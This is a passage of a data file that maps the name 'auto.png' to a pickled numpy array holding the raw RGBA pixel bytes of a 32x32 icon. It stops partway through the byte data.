'auto.png': "cnumpy.core.multiarray\n_reconstruct\np0\n(cnumpy\nndarray\np1\n(I0\ntp2\nS'b'\np3\ntp4\nRp5\n(I1\n(I32\nI32\nI4\ntp6\ncnumpy\ndtype\np7\n(S'u1'\np8\nI0\nI1\ntp9\nRp10\n(I3\nS'|'\np11\nNNNI-1\nI-1\nI0\ntp12\nbI00\nS'\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xad\\xad\\xad\\x19\\xa8\\xa8\\xa8\\x8d\\xa9\\xa9\\xa9\\xc1\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xaa\\xaa\\xaa\\xc2\\xa9\\xa9\\xa9\\x8e\\xad\\xad\\xad\\x19\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xa8\\xa8\\xa8X\\xa9\\xa9\\xa9\\xed\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xed\\xa8\\xa8\\xa8X\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaaW\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x
a6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xaa\\xaa\\xaaW\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\xeb\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff)))\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff)))\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xeb\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff\\x03\\x03\\x03\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x19\\x19\\x19\\xff\\x03\\x03\\x03\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xbe\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff)))\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x04\\x04\\x04\\xffHHH\\xff\\xa4\\xa4\\xa4\\xff\\xe5\\xe5\\xe5\\xff\\x00\\x00\\x00\\xff)))\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xbe\\xa9\\
xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff \\xffyyy\\xff\\xd1\\xd1\\xd1\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff\\xa6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x06\\x06\\x06\\xffPPP\\xff\\xab\\xab\\xab\\xff\\xe6\\xe6\\xe6\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff&&&\\xff\\x82\\x82\\x82\\xff\\xd6\\xd6\\xd6\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\
xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\t\\t\\t\\xffWWW\\xff\\xb2\\xb2\\xb2\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe5\\xe5\\xe5\\xff\\xa8\\xa8\\xa8\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff---\\xff\\x89\\x89\\x89\\xff\\xda\\xda\\xda\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xc1\\xc1\\xc1\\xfflll\\xff\\x18\\x18\\x18\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\r\\r\\r\\xff^^^\\xff\\xba\\xba\\xba\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xda\\xda\\xda\\xff...\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff555\\xff\\x90\\x90\\x90\\xff\\xde\\xde\\xde\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\
\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe2\\xe2\\xe2\\xff\\xe3\\xe3\\xe3\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xd2\\xd2\\xd2\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff;;;\\xff\\xc1\\xc1\\xc1\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xb7\\xb7\\xb7\\xffbbb\\xff\\x12\\x12\\x12\\xff\\xcb\\xcb\\xcb\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xd2\\xd2\\xd2\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xffmmm\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xcd\\xcd\\xcd\\xffyyy\\xff$$$\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xcb\\xcb\\xcb\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xd2\\xd2\\xd2\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xffmmm\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe3\\xe3\\xe3\\xff\\x91\\x91\\x91\\xff<<<\\xff\\x01\\x01\\x01\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xcb\\xcb\\xcb\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xd2\\xd2\\xd2\\xff\\x00\\x00\\x00\\xff\\x00
\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xffmmm\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xc3\\xc3\\xc3\\xfflll\\xff\\x18\\x18\\x18\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xcb\\xcb\\xcb\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xd2\\xd2\\xd2\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xffmmm\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe4\\xe4\\xe4\\xff\\xa6\\xa6\\xa6\\xffOOO\\xff\\x07\\x07\\x07\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xcb\\xcb\\xcb\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xd2\\xd2\\xd2\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff555\\xff\\xb4\\xb4\\xb4\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xd9\\xd9\\xd9\\xff\\x8a\\x8a\\x8a\\xff333\\xff\\xcb\\xcb\\xcb\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xd2\\xd2\\xd2\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\
xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff+++\\xff\\x88\\x88\\x88\\xff\\xda\\xda\\xda\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xd2\\xd2\\xd2\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\n\\n\\n\\xff[[[\\xff\\xb8\\xb8\\xb8\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xdc\\xdc\\xdc\\xffAAA\\xff\\x02\\x02\\x02\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff...\\xff\\x8c\\x8c\\x8c\\xff\\xdc\\xdc\\xdc\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xcc\\xcc\\xcc\\xffsss\\xff\\x1a\\x1a\\x1a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x
00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x0c\\x0c\\x0c\\xff___\\xff\\xbc\\xbc\\xbc\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe5\\xe5\\xe5\\xff\\xa5\\xa5\\xa5\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff222\\xff\\x8f\\x8f\\x8f\\xff\\xde\\xde\\xde\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x0e\\x0e\\x0e\\xffccc\\xff\\xc0\\xc0\\xc0\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xf
f\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff555\\xff\\x94\\x94\\x94\\xff\\xe0\\xe0\\xe0\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff\\xa6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xbd\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff)))\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x10\\x10\\x10\\xfffff\\xff\\xc4\\xc4\\xc4\\xff\\xe7\\xe7\\xe7\\xff\\x00\\x00\\x00\\xff)))\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xbd\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\